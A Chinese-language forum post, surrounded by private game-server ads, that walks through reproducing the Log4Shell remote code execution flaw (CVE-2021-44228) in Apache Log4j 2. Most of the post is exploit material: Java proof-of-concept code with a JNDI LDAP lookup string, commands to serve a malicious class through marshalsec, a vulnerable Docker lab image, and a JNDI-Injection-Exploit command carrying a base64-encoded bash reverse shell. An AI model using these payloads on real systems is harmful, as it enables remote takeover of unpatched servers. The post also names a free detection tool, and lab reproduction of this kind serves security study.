12558网页游戏私服论坛

 找回密码
 立即注册
游戏开服表 申请开服
游戏名称 游戏描述 开服状态 游戏福利 运营商 游戏链接
攻城掠地-仿官 全新玩法,觉醒武将,觉醒技能 每周新区 经典复古版本,长久稳定 进入游戏
巅峰新版攻 攻城掠地公益服 攻城掠地SF 新兵种、新武将(兵种) 进入游戏
游戏盒子— 各种稀有手游私服,可以下载 各种变态版 手游交流群:117375085 进入游戏
刀剑演武 现金BOSS,不氪金也能毕业! 创角就赠送至尊8 绝版GM装备送! 进入游戏
《绝世秘籍》 每日精彩活动嗨不停 充值赠送会员 积分换极品装备 进入游戏
《百战沙城》 不肝不氪也可群殴boss 装备满屏爆 超值首充 进入游戏
全民仙战 任意首充送纯白歌宴绝版绚丽时装! 元宝福利免费领 今日新开 进入游戏
查看: 396|回复: 0

CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞

[复制链接]
发表于 2022-1-28 22:23:31 | 显示全部楼层 |阅读模式

影响范围


Apache Log4j 2.x < 2.15.0-rc2
本地复现https://github.com/tangxiaofeng7/apache-log4j-poclog4j.java内容[Java] 纯文本查看 复制代码import org.apache.logging.log4j.LogManager;import org.apache.logging.log4j.Logger;  public class log4j {    private static final Logger logger = LogManager.getLogger(log4j.class);     public static void main(String[] args) {        System.setProperty(&quot;com.sun.jndi.ldap.object.trustURLCodebase&quot;, &quot;true&quot;);        logger.error(&quot;${jndi:ldap://127.0.0.1:1389/Log4jRCE}&quot;);     }}Log4jRCE.java[Java] 纯文本查看 复制代码public class Log4jRCE {    static {        try {            String [] cmd={&quot;calc&quot;};            java.lang.Runtime.getRuntime().exec(cmd).waitFor();        }catch (Exception e){            e.printStackTrace();        }    } }注意,这里Log4jRCE.java不要放在项目里,我这里将Log4jRCE.class放到了D盘根目次,不然log4j.java运行时会读取到本地的Log4jRCE,就不是http长途下载了在D盘根目次[Asm] 纯文本查看 复制代码python -m http.server 8888然后执行[Asm] 纯文本查看 复制代码java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer &quot;http://127.0.0.1:8888/#Log4jRCE&quot;
长途RCE
docker拉个镜像[Asm] 纯文本查看 复制代码docker pull vulfocus/log4j2-rce-2021-12-09:latestdocker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest先用网上公开的exp探测一下(此处为了引起不要的麻烦打码,你懂的)
反弹shell
需要用到JNDI-Injection-Exploit启动&#12032;个rmi和ldap服务器,15c1貌似给ldap禁了但是rmi可以用,所以有了15c2
[Asm] 纯文本查看 复制代码java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C &quot;bash -c {echo,xxxxxxxxxxxxxxxxxxuNzYuNDkvODQ0NCAwPiYx}|{base64,-d}|{bash,-i}&quot; -A 127.0.0.1
burp发包即可


毛病检测工具
保举长亭科技免费推出的工具https://log4j2-detector.chaitin.cn

来源:http://www.12558.net
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
楼主热帖
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|12558网页游戏私服论坛 |网站地图

GMT+8, 2022-10-5 12:47 , Processed in 0.109375 second(s), 22 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表